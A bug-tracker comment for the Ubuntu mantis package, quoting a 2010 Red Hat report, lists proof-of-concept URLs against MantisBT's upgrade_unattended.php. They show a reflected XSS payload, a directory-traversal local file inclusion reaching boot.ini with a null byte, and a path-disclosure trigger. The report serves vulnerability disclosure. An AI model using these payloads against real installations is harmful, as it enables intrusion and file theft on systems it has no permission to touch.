Ubuntu
mantis package

Comment 24 for bug 690482

Revision history for this message

In Red Hat Bugzilla #663230, Jan (jan-redhat-bugs) wrote on 2010-12-15:

#24

1), cross-site scripting (XSS):
http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=%3Cscript%3Ealert%281%29%3C/script%3E

2), local file inclusion (LFI):
http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

3), path disclosure (PD):
http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=%27